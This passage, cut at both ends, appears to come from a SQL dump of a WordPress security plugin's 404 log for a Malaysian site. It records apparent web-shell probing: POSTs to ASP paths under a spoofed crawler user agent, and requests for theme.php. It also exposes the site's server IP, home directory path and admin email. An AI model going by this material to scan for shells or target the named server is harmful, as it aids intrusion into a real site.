http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"210.40.193.249\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"210.40.193.249\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"http://bintara.com.my/images/index.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:17:\"/images/index.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XasmFvBciE@oGFkw1sch-wAAARQ\";s:12:\"REDIRECT_URL\";s:17:\"/images/index.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"62786\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:38:\"http://bintara.com.my/images/index.asp\";s:10:\"SCRIPT_URL\";s:17:\"/images/index.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XasmFvBciE@oGFkw1sch-wAAARQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571497494.8667\";s:12:\"REQUEST_TIME\";s:10:\"1571497494\";}}','notice','2019-10-19 15:04:58','2019-10-19 15:04:55',35267184,37073096,'http://bintara.com.my//images/index.asp',1,0,'210.40.193.249'),(28388,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"//images/index.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"816\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"124.224.195.35\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"124.224.195.35\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"http://bintara.com.my/images/index.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:17:\"/images/index.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XasmDvBciE@oGFkw1sch-gAAARI\";s:12:\"REDIRECT_URL\";s:17:\"/images/index.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"62786\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:38:\"http://bintara.com.my/images/index.asp\";s:10:\"SCRIPT_URL\";s:17:\"/images/index.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XasmDvBciE@oGFkw1sch-gAAARI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571497486.6713\";s:12:\"REQUEST_TIME\";s:10:\"1571497486\";}}','notice','2019-10-19 15:04:50','2019-10-19 15:04:47',35337960,37140576,'http://bintara.com.my//images/index.asp',1,0,'124.224.195.35'),(28387,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:68:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:10:\"/theme.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:6:\"H2PUSH\";s:3:\"off\";s:7:\"H2_PUSH\";s:3:\"off\";s:9:\"H2_PUSHED\";s:0:\"\";s:12:\"H2_PUSHED_ON\";s:0:\"\";s:12:\"H2_STREAM_ID\";s:1:\"1\";s:13:\"H2_STREAM_TAG\";s:4:\"20-1\";s:5:\"HTTP2\";s:2:\"on\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"http://site.ru\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_H2PUSH\";s:3:\"off\";s:16:\"REDIRECT_H2_PUSH\";s:3:\"off\";s:18:\"REDIRECT_H2_PUSHED\";s:0:\"\";s:21:\"REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:21:\"REDIRECT_H2_STREAM_ID\";s:1:\"1\";s:22:\"REDIRECT_H2_STREAM_TAG\";s:4:\"20-1\";s:14:\"REDIRECT_HTTP2\";s:2:\"on\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:24:\"REDIRECT_REDIRECT_H2PUSH\";s:3:\"off\";s:25:\"REDIRECT_REDIRECT_H2_PUSH\";s:3:\"off\";s:27:\"REDIRECT_REDIRECT_H2_PUSHED\";s:0:\"\";s:30:\"REDIRECT_REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:30:\"REDIRECT_REDIRECT_H2_STREAM_ID\";s:1:\"1\";s:31:\"REDIRECT_REDIRECT_H2_STREAM_TAG\";s:4:\"20-1\";s:23:\"REDIRECT_REDIRECT_HTTP2\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:32:\"https://bintara.com.my/theme.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:10:\"/theme.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"Xasl@gYF48xX3r6hM@l@RAAAAAE\";s:19:\"REDIRECT_SCRIPT_URI\";s:32:\"https://bintara.com.my/theme.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:10:\"/theme.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xasl@gYF48xX3r6hM@l@RAAAAAE\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:11:\"5.61.30.195\";s:11:\"REMOTE_PORT\";s:5:\"38433\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:32:\"https://bintara.com.my/theme.php\";s:10:\"SCRIPT_URL\";s:10:\"/theme.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xasl@gYF48xX3r6hM@l@RAAAAAE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571497466.8674\";s:12:\"REQUEST_TIME\";s:10:\"1571497466\";}}','notice','2019-10-19 15:04:29','2019-10-19 15:04:27',34986936,36795096,'https://bintara.com.my/theme.php',1,0,'5.61.30.195'),(28386,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:68:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:10:\"/theme.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:6:\"H2PUSH\";s:3:\"off\";s:7:\"H2_PUSH\";s:3:\"off\";s:9:\"H2_PUSHED\";s:0:\"\";s:12:\"H2_PUSHED_ON\";s:0:\"\";s:12:\"H2_STREAM_ID\";s:1:\"1\";s:13:\"H2_STREAM_TAG\";s:4:\"14-1\";s:5:\"HTTP2\";s:2:\"on\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"http://site.ru\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_H2PUSH\";s:3:\"off\";s:16:\"REDIRECT_H2_PUSH\";s:3:\"off\";s:18:\"REDIRECT_H2_PUSHED\";s:0:\"\";s:21:\"REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:21:\"REDIRECT_H2_STREAM_ID\";s:1:\"1\";s:22:\"REDIRECT_H2_STREAM_TAG\";s:4:\"14-1\";s:14:\"REDIRECT_HTTP2\";s:2:\"on\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:24:\"REDIRECT_REDIRECT_H2PUSH\";s:3:\"off\";s:25:\"REDIRECT_REDIRECT_H2_PUSH\";s:3:\"off\";s:27:\"REDIRECT_REDIRECT_H2_PUSHED\";s:0:\"\";s:30:\"REDIRECT_REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:30:\"REDIRECT_REDIRECT_H2_STREAM_ID\";s:1:\"1\";s:31:\"REDIRECT_REDIRECT_H2_STREAM_TAG\";s:4:\"14-1\";s:23:\"REDIRECT_REDIRECT_HTTP2\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:32:\"https://bintara.com.my/theme.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:10:\"/theme.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"Xasl9QYF48xX3r6hM@l@QAAAAAE\";s:19:\"REDIRECT_SCRIPT_URI\";s:32:\"https://bintara.com.my/theme.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:10:\"/theme.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xasl9QYF48xX3r6hM@l@QAAAAAE\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:11:\"5.61.30.195\";s:11:\"REMOTE_PORT\";s:5:\"38075\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:32:\"https://bintara.com.my/theme.php\";s:10:\"SCRIPT_URL\";s:10:\"/theme.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xasl9QYF48xX3r6hM@l@QAAAAAE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1571497461.404\";s:12:\"REQUEST_TIME\";s:10:\"1571497461\";}}','notice','2019-10-19 15:04:23','2019-10-19 15:04:21',34987480,36795008,'https://bintara.com.my/theme.php',1,0,'5.61.30.195'),(28384,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:8:\"//aa.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"826\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"58.206.71.101\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"58.206.71.101\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:28:\"http://bintara.com.my/aa.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:7:\"/aa.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xasle-BciE@oGFkw1sch2QAAARc\";s:12:\"REDIRECT_URL\";s:7:\"/aa.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"58833\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:28:\"http://bintara.com.my/aa.asp\";s:10:\"SCRIPT_URL\";s:7:\"/aa.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xasle-BciE@oGFkw1sch2QAAARc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571497339.2156\";s:12:\"REQUEST_TIME\";s:10:\"1571497339\";}}','notice','2019-10-19 15:02:23','2019-10-19 15:02:19',35737080,37540648,'http://bintara.com.my//aa.asp',1,0,'58.206.71.101'),(28385,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:8:\"//aa.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"691\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:15:\"220.173.112.166\";s:20:\"HTTP_X_FORWARDED_FOR\";s:15:\"220.173.112.166\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:28:\"http://bintara.com.my/aa.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:7:\"/aa.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaslgvBciE@oGFkw1sch4AAAAQ0\";s:12:\"REDIRECT_URL\";s:7:\"/aa.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"58833\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:28:\"http://bintara.com.my/aa.asp\";s:10:\"SCRIPT_URL\";s:7:\"/aa.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XaslgvBciE@oGFkw1sch4AAAAQ0\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571497346.6143\";s:12:\"REQUEST_TIME\";s:10:\"1571497346\";}}','notice','2019-10-19 15:02:28','2019-10-19 15:02:27',35269696,37070344,'http://bintara.com.my//aa.asp',1,0,'220.173.112.166'),(28383,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"//member/testp.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"681\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"220.196.74.80\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"220.196.74.80\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"http://bintara.com.my/member/testp.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:17:\"/member/testp.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XasktbdRi@RFkkQCXDBOFgAAAEI\";s:12:\"REDIRECT_URL\";s:17:\"/member/testp.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"52467\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:38:\"http://bintara.com.my/member/testp.asp\";s:10:\"SCRIPT_URL\";s:17:\"/member/testp.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XasktbdRi@RFkkQCXDBOFgAAAEI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1571497141.226\";s:12:\"REQUEST_TIME\";s:10:\"1571497141\";}}','notice','2019-10-19 14:59:03','2019-10-19 14:59:01',35269400,37079200,'http://bintara.com.my//member/testp.asp',1,0,'220.196.74.80'),(28382,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"//member/testp.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"816\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:12:\"218.61.33.12\";s:20:\"HTTP_X_FORWARDED_FOR\";s:12:\"218.61.33.12\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"http://bintara.com.my/member/testp.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:17:\"/member/testp.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XasksbdRi@RFkkQCXDBOFQAAAEg\";s:12:\"REDIRECT_URL\";s:17:\"/member/testp.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"52467\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:38:\"http://bintara.com.my/member/testp.asp\";s:10:\"SCRIPT_URL\";s:17:\"/member/testp.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XasksbdRi@RFkkQCXDBOFQAAAEg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571497137.3293\";s:12:\"REQUEST_TIME\";s:10:\"1571497137\";}}','notice','2019-10-19 14:58:59','2019-10-19 14:58:57',35335160,37136232,'http://bintara.com.my//member/testp.asp',1,0,'218.61.33.12'),(28381,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:17:\"//inc/NewFile.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"682\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; 